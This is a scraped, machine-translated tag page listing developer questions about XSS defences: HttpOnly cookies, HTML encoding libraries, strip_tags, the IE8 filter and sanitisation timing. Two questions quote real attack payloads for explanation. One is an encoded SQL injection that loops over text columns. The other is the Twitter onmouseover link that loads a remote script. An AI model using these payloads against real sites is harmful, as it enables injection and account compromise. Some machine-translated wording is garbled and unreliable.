Tag: xss

哪些浏览器支持HttpOnly cookies?

哪些浏览器支持HttpOnly cookies,以及哪个版本? 请参阅http://www.codinghorror.com/blog/archives/001167.html关于HttpOnly cookie和XSS预防的讨论。

如何在ASP.NET中configurationhttpOnlyCookies?

受此CodingHorror文章的启发,“ 保护您的Cookie:HttpOnly ” 你如何设置这个属性? 在networkingconfiguration的某处?

AntiXss.HtmlEncode和HttpUtility.HtmlEncode有什么区别?

我只是碰到了一个问题,提供了一个答案,build议AntiXss库避免跨站点脚本。 听起来有趣,阅读msdn博客 ,它似乎只提供一个HtmlEncode()方法。 但是我已经使用HttpUtility.HtmlEncode()。 为什么我想要通过HttpUtility.HtmlEncode使用AntiXss.HtmlEncode? 事实上,我不是第一个问这个问题的。 而且,Google的确主要提供了一些 答案 白名单而不是黑名单的方法 性能提升0.1毫秒 那很好,但这对我意味着什么? 我不关心0.1ms的性能,我真的不觉得像我已经有的function下载和添加另一个库依赖项。 AntiXss实现是否会阻止HttpUtility实现不会执行的攻击? 如果我继续使用HttpUtility实现,我是否有风险? 这个“错误”呢?

如何将parameter passing给Script标签?

我读了Nic博士的XSS Widgets的教程: http ://drnicwilliams.com/2006/11/21/diy-widgets/。 我正在寻找一种方法将parameter passing给脚本标记。 例如,做以下工作: <script src =“http://path/to/widget.js?param_a = 1&param_b = 3”> 有没有办法做到这一点? 更新:两个有趣的链接: 如何embeddedJavaScript的小部件,取决于jQuery到一个未知的环境 (Stackoverflow讨论) 将parameter passing给脚本标记的文章

strip_tags()容易受到脚本攻击吗?

是否有一个已知的XSS或其他攻击,使其通过一个 $content = "some HTML code"; $content = strip_tags($content); echo $content; ? 手册有一个警告: 此function不会修改您允许使用allowable_tags的标签上的任何属性,包括恶作剧的用户在发布将显示给其他用户的文本时可能会滥用的样式和onmouseover属性。 但是这与仅使用allowable_tags参数有关。 没有设置允许的标签 , strip_tags()容易受到攻击? Chris Shiflett似乎说这是安全的: 使用成熟的解决scheme 如果可能,请使用成熟的现有解决scheme,而不是尝试创build自己的解决scheme 像strip_tags()和htmlentities()这样的函数是很好的select。 它是否正确? 请尽可能引用来源。 我知道关于HTML净化器,htmlspecialchars()等 – 我不是在寻求最好的方法来消毒HTML。 我只想知道这个具体问题。 这是一个理论上的问题。 参考: PHP源代码中的strip_tags()实现

IE8 XSSfilter:它真的做了什么?

Internet Explorer 8具有新的安全function,即尝试拦截跨站脚本尝试的XSSfilter 。 这是这样描述的: XSS筛选器是Internet Explorer 8的新增function,可检测URL和HTTP POST请求中的JavaScript。 如果检测到JavaScript,则XSS筛选searchreflection的证据,如果攻击请求未被更改,则会返回到攻击性网站的信息。 如果检测到reflection,则XSSfilter会清理原始请求,以便不能执行其他JavaScript。 即使没有“reflection证据”,我发现XSSfilter也会启动,并开始认为filter只是在向其他站点发出请求并且响应包含JavaScript时才会发现。 但即使这样也难以validation,因为效果似乎来来去去。 IE有不同的区域,就在我认为我已经重现了这个问题的时候,filter就不再踢了,我不知道为什么。 任何人有任何提示如何解决这个问题? 什么是filter真的在寻找? 有没有什么办法可以让一个好人把数据发布到第三方网站,这个网站可以返回HTML来显示在iframe中而不会触发filter? 背景:我正在从第三方网站加载JavaScript库。 JavaScript从当前HTML页面获取一些数据,并将其发布到第三方站点,该站点响应一些HTML以显示在iframe中。 要看到它在行动,请访问AOL食品页面,然后单击故事上方的“打印”图标。

有人可以向我解释这个SQL注入攻击?

我想在这里发表,因为它是非常多的编码相关的,是我本公司的一个旧的ASP(经典)网站本周必须清理的东西。 我们遇到了几天前刚刚运行的SQL注入攻击,但是我正在摸索我的头脑究竟是什么“损害”到SQL服务器(通过这些SQL查询)。 说实话,我认为这样做是非常巧妙的,而我的公司却因为拥有一个十年前的老旧网站而产生了很大的缺陷。 攻击: 122 +声明+%的40s + VARCHAR%284000%29 + +设定40年代%%3Dcast%+ AS + VARCHAR%284000%29%29 + EXEC%28%40年代%29- 什么解码:( 我想了解的) set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) […]

在Javascript中构buildHTMLstring真的不安全吗?

托pipe我们网站的公司在部署之前审查我们的代码 – 他们最近告诉我们这个: 不应该直接操纵HTMLstring,因为这会打开潜在的XSS漏洞。 相反,总是使用DOM API创build元素…可以是jQuery或直接的DOM API。 例如,而不是 this.html.push( '<a class="quiz-au" data-src="' + this.au + '"><span class="quiz-au-icon"></span>Click to play</a>' ); 他们告诉我们这样做 var quizAuLink = $( 'a' ); quizAuLink.addClass( 'quiz-au' ); quizAuLink.data( 'src', this.au ); quizAu.text( 'Click to play' ); quizAu.prepend( '<span class="quiz-au-icon"></span>' ); 这是真的吗? 任何人都可以给我们一个XSS攻击的例子,可以利用像第一个HTMLstring?

什么时候最好对用户input进行清理?

用户等于不可信。 永远不要相信不值得信任的用户的input。 我明白了。 但是,我想知道什么时候最好的时间来消毒input。 例如,是否盲目地存储用户input,然后在访问/使用时对其进行清理,或者是否立即清理input,然后存储此“已清除”的版本? 也许除了这些之外,还有其他一些我没有的方法。 我更倾向于第一种方法,因为任何来自用户input的数据都必须谨慎对待,在那里“清理”的数据可能仍然在不知不觉中或意外地是危险的。 无论哪种方式,人们认为最好的方法是什么,为什么?

twitter.com上今天的XSS onmouseover漏洞利用

你能解释一下今天在Twitter上发生了什么? 基本上这个漏洞使人们发布一条包含这个链接的推文: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ 这在技术上是XSS攻击还是其他? 以下是Twitter主页的样子: http : //www.flickr.com/photos/travelist/6832853140/